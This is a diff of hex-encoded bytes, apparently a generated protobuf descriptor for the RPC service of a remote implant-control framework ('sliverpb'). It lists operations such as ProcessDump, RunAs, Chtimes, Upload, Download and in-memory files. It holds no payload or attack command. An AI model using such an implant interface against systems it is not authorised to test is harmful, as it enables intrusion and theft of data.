- 0x74, 0x65, 0x1a, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65,
- 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x33, 0x0a, 0x0d, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65,
- 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x12, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
- 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d,
- 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x43, 0x0a, 0x11, 0x57, 0x65,
- 0x62, 0x73, 0x69, 0x74, 0x65, 0x41, 0x64, 0x64, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12,
- 0x1b, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69,
- 0x74, 0x65, 0x41, 0x64, 0x64, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x1a, 0x11, 0x2e, 0x63,
- 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12,
- 0x46, 0x0a, 0x14, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x55, 0x70, 0x64, 0x61, 0x74, 0x65,
- 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74,
- 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x41, 0x64, 0x64, 0x43, 0x6f, 0x6e,
- 0x74, 0x65, 0x6e, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e,
- 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x49, 0x0a, 0x14, 0x57, 0x65, 0x62, 0x73, 0x69,
- 0x74, 0x65, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12,
- 0x1e, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69,
- 0x74, 0x65, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x1a,
- 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69,
- 0x74, 0x65, 0x12, 0x26, 0x0a, 0x04, 0x50, 0x69, 0x6e, 0x67, 0x12, 0x0e, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x6e, 0x67, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x6e, 0x67, 0x12, 0x23, 0x0a, 0x02, 0x50, 0x73,
- 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x73, 0x52, 0x65,
- 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x73, 0x12,
- 0x38, 0x0a, 0x09, 0x54, 0x65, 0x72, 0x6d, 0x69, 0x6e, 0x61, 0x74, 0x65, 0x12, 0x16, 0x2e, 0x73,
- 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x65, 0x72, 0x6d, 0x69, 0x6e, 0x61, 0x74,
- 0x65, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x54, 0x65, 0x72, 0x6d, 0x69, 0x6e, 0x61, 0x74, 0x65, 0x12, 0x35, 0x0a, 0x08, 0x49, 0x66, 0x63,
- 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x49, 0x66, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73,
+ 0x1a, 0x1b, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66,
+ 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x4d, 0x61, 0x70, 0x12, 0x4c, 0x0a,
+ 0x11, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x41,
+ 0x64, 0x64, 0x12, 0x18, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72,
+ 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x1a, 0x1d, 0x2e, 0x63,
+ 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45,
+ 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x54, 0x65, 0x73, 0x74, 0x73, 0x12, 0x3d, 0x0a, 0x10, 0x54,
+ 0x72, 0x61, 0x66, 0x66, 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x52, 0x6d, 0x12,
+ 0x18, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x54, 0x72, 0x61, 0x66, 0x66,
+ 0x69, 0x63, 0x45, 0x6e, 0x63, 0x6f, 0x64, 0x65, 0x72, 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d,
+ 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x12, 0x2f, 0x0a, 0x08, 0x57, 0x65,
+ 0x62, 0x73, 0x69, 0x74, 0x65, 0x73, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70,
+ 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x12, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74,
+ 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x73, 0x12, 0x2f, 0x0a, 0x07, 0x57,
+ 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x1a, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65,
+ 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x33, 0x0a, 0x0d,
+ 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x12, 0x11, 0x2e,
+ 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65,
+ 0x1a, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74,
+ 0x79, 0x12, 0x43, 0x0a, 0x11, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x41, 0x64, 0x64, 0x43,
+ 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12, 0x1b, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x41, 0x64, 0x64, 0x43, 0x6f, 0x6e, 0x74,
+ 0x65, 0x6e, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57,
+ 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x46, 0x0a, 0x14, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74,
+ 0x65, 0x55, 0x70, 0x64, 0x61, 0x74, 0x65, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12, 0x1b,
+ 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74,
+ 0x65, 0x41, 0x64, 0x64, 0x43, 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6c,
+ 0x69, 0x65, 0x6e, 0x74, 0x70, 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x49,
+ 0x0a, 0x14, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x43,
+ 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x12, 0x1e, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x52, 0x65, 0x6d, 0x6f, 0x76, 0x65, 0x43,
+ 0x6f, 0x6e, 0x74, 0x65, 0x6e, 0x74, 0x1a, 0x11, 0x2e, 0x63, 0x6c, 0x69, 0x65, 0x6e, 0x74, 0x70,
+ 0x62, 0x2e, 0x57, 0x65, 0x62, 0x73, 0x69, 0x74, 0x65, 0x12, 0x26, 0x0a, 0x04, 0x50, 0x69, 0x6e,
+ 0x67, 0x12, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x6e,
+ 0x67, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x69, 0x6e,
+ 0x67, 0x12, 0x23, 0x0a, 0x02, 0x50, 0x73, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x50, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x50, 0x73, 0x12, 0x38, 0x0a, 0x09, 0x54, 0x65, 0x72, 0x6d, 0x69, 0x6e,
+ 0x61, 0x74, 0x65, 0x12, 0x16, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54,
+ 0x65, 0x72, 0x6d, 0x69, 0x6e, 0x61, 0x74, 0x65, 0x52, 0x65, 0x71, 0x1a, 0x13, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x54, 0x65, 0x72, 0x6d, 0x69, 0x6e, 0x61, 0x74, 0x65,
+ 0x12, 0x35, 0x0a, 0x08, 0x49, 0x66, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x12, 0x15, 0x2e, 0x73,
0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49, 0x66, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67,
- 0x12, 0x32, 0x0a, 0x07, 0x4e, 0x65, 0x74, 0x73, 0x74, 0x61, 0x74, 0x12, 0x14, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4e, 0x65, 0x74, 0x73, 0x74, 0x61, 0x74, 0x52, 0x65,
- 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4e, 0x65, 0x74,
- 0x73, 0x74, 0x61, 0x74, 0x12, 0x23, 0x0a, 0x02, 0x4c, 0x73, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c,
- 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x73, 0x12, 0x24, 0x0a, 0x02, 0x43, 0x64, 0x12,
- 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x64, 0x52, 0x65, 0x71,
- 0x1a, 0x0d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x77, 0x64, 0x12,
- 0x26, 0x0a, 0x03, 0x50, 0x77, 0x64, 0x12, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x50, 0x77, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x0d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x50, 0x77, 0x64, 0x12, 0x23, 0x0a, 0x02, 0x4d, 0x76, 0x12, 0x0f, 0x2e,
- 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x76, 0x52, 0x65, 0x71, 0x1a, 0x0c,
- 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x76, 0x12, 0x23, 0x0a, 0x02,
- 0x43, 0x70, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x70,
- 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43,
- 0x70, 0x12, 0x23, 0x0a, 0x02, 0x52, 0x6d, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x52, 0x6d, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
- 0x72, 0x70, 0x62, 0x2e, 0x52, 0x6d, 0x12, 0x2c, 0x0a, 0x05, 0x4d, 0x6b, 0x64, 0x69, 0x72, 0x12,
- 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x6b, 0x64, 0x69, 0x72,
- 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d,
- 0x6b, 0x64, 0x69, 0x72, 0x12, 0x35, 0x0a, 0x08, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64,
- 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x44, 0x6f, 0x77, 0x6e,
- 0x6c, 0x6f, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x2f, 0x0a, 0x06, 0x55,
- 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x13, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
- 0x2e, 0x55, 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x10, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x55, 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x29, 0x0a, 0x04,
- 0x47, 0x72, 0x65, 0x70, 0x12, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x47, 0x72, 0x65, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x0e, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x47, 0x72, 0x65, 0x70, 0x12, 0x2c, 0x0a, 0x05, 0x43, 0x68, 0x6d, 0x6f, 0x64,
- 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x6d, 0x6f,
- 0x64, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x43, 0x68, 0x6d, 0x6f, 0x64, 0x12, 0x2c, 0x0a, 0x05, 0x43, 0x68, 0x6f, 0x77, 0x6e, 0x12, 0x12,
- 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x6f, 0x77, 0x6e, 0x52,
- 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68,
- 0x6f, 0x77, 0x6e, 0x12, 0x32, 0x0a, 0x07, 0x43, 0x68, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x12, 0x14,
- 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x74, 0x69, 0x6d, 0x65,
- 0x73, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x43, 0x68, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x12, 0x37, 0x0a, 0x0c, 0x4d, 0x65, 0x6d, 0x66, 0x69,
- 0x6c, 0x65, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x19, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x52,
+ 0x52, 0x65, 0x71, 0x1a, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x49,
+ 0x66, 0x63, 0x6f, 0x6e, 0x66, 0x69, 0x67, 0x12, 0x32, 0x0a, 0x07, 0x4e, 0x65, 0x74, 0x73, 0x74,
+ 0x61, 0x74, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4e, 0x65,
+ 0x74, 0x73, 0x74, 0x61, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
+ 0x72, 0x70, 0x62, 0x2e, 0x4e, 0x65, 0x74, 0x73, 0x74, 0x61, 0x74, 0x12, 0x23, 0x0a, 0x02, 0x4c,
+ 0x73, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x73, 0x52,
0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4c, 0x73,
- 0x12, 0x3e, 0x0a, 0x0b, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64, 0x12,
- 0x18, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69,
- 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76,
- 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x41, 0x64, 0x64,
- 0x12, 0x3b, 0x0a, 0x0a, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x52, 0x6d, 0x12, 0x17,
+ 0x12, 0x24, 0x0a, 0x02, 0x43, 0x64, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x43, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x0d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x50, 0x77, 0x64, 0x12, 0x26, 0x0a, 0x03, 0x50, 0x77, 0x64, 0x12, 0x10, 0x2e,
+ 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x77, 0x64, 0x52, 0x65, 0x71, 0x1a,
+ 0x0d, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x77, 0x64, 0x12, 0x23,
+ 0x0a, 0x02, 0x4d, 0x76, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
+ 0x4d, 0x76, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x4d, 0x76, 0x12, 0x23, 0x0a, 0x02, 0x43, 0x70, 0x12, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x0c, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x70, 0x12, 0x23, 0x0a, 0x02, 0x52, 0x6d, 0x12, 0x0f,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x6d, 0x52, 0x65, 0x71, 0x1a,
+ 0x0c, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x52, 0x6d, 0x12, 0x2c, 0x0a,
+ 0x05, 0x4d, 0x6b, 0x64, 0x69, 0x72, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
+ 0x62, 0x2e, 0x4d, 0x6b, 0x64, 0x69, 0x72, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69,
+ 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x6b, 0x64, 0x69, 0x72, 0x12, 0x35, 0x0a, 0x08, 0x44,
+ 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x12,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x44, 0x6f, 0x77, 0x6e, 0x6c, 0x6f,
+ 0x61, 0x64, 0x12, 0x2f, 0x0a, 0x06, 0x55, 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x12, 0x13, 0x2e, 0x73,
+ 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x55, 0x70, 0x6c, 0x6f, 0x61, 0x64, 0x52, 0x65,
+ 0x71, 0x1a, 0x10, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x55, 0x70, 0x6c,
+ 0x6f, 0x61, 0x64, 0x12, 0x29, 0x0a, 0x04, 0x47, 0x72, 0x65, 0x70, 0x12, 0x11, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x47, 0x72, 0x65, 0x70, 0x52, 0x65, 0x71, 0x1a, 0x0e,
+ 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x47, 0x72, 0x65, 0x70, 0x12, 0x2c,
+ 0x0a, 0x05, 0x43, 0x68, 0x6d, 0x6f, 0x64, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
+ 0x70, 0x62, 0x2e, 0x43, 0x68, 0x6d, 0x6f, 0x64, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x6d, 0x6f, 0x64, 0x12, 0x2c, 0x0a, 0x05,
+ 0x43, 0x68, 0x6f, 0x77, 0x6e, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x43, 0x68, 0x6f, 0x77, 0x6e, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76,
+ 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x6f, 0x77, 0x6e, 0x12, 0x32, 0x0a, 0x07, 0x43, 0x68,
+ 0x74, 0x69, 0x6d, 0x65, 0x73, 0x12, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62,
+ 0x2e, 0x43, 0x68, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x11, 0x2e, 0x73, 0x6c,
+ 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x43, 0x68, 0x74, 0x69, 0x6d, 0x65, 0x73, 0x12, 0x37,
+ 0x0a, 0x0c, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x19,
0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c,
- 0x65, 0x73, 0x52, 0x6d, 0x52, 0x65, 0x71, 0x1a, 0x14, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72,
- 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x6d, 0x66, 0x69, 0x6c, 0x65, 0x73, 0x52, 0x6d, 0x12, 0x2c, 0x0a,
- 0x05, 0x4d, 0x6f, 0x75, 0x6e, 0x74, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70,
- 0x62, 0x2e, 0x4d, 0x6f, 0x75, 0x6e, 0x74, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x4d, 0x6f, 0x75, 0x6e, 0x74, 0x12, 0x3e, 0x0a, 0x0b, 0x50,
- 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x44, 0x75, 0x6d, 0x70, 0x12, 0x18, 0x2e, 0x73, 0x6c, 0x69,
- 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x44, 0x75, 0x6d,
- 0x70, 0x52, 0x65, 0x71, 0x1a, 0x15, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x44, 0x75, 0x6d, 0x70, 0x12, 0x2c, 0x0a, 0x05, 0x52,
- 0x75, 0x6e, 0x41, 0x73, 0x12, 0x12, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65, 0x72, 0x70, 0x62, 0x2e,
- 0x52, 0x75, 0x6e, 0x41, 0x73, 0x52, 0x65, 0x71, 0x1a, 0x0f, 0x2e, 0x73, 0x6c, 0x69, 0x76, 0x65,
